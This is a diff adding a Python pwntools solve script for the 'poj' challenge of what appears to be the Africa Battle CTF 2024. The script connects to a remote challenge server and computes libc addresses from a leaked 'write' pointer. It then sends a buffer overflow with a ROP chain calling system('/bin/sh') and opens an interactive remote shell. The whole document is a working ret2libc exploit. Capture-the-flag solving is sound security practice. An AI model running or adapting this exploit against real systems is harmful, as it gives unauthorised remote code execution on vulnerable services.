solve script

africabattlectf_2024/poj/a.py

@@ -0,0 +1,30 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./poj", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1003)
+
+# leak
+r.recvuntil(b": ")
+write = int(r.recvline().strip(), 16)
+log.info("write: 0x%lx", write)
+libc_base = write - 0xff4d0
+log.info("libc: 0x%lx", libc_base)
+system = libc_base + 0x4dab0
+log.info("system: 0x%lx", system)
+sh = libc_base + 0x197e34
+
+# gadgets
+pop_rdi = libc_base + 0x28215
+
+# pop
+buf = b"A"*72
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+r.sendline(buf)
+
+r.interactive()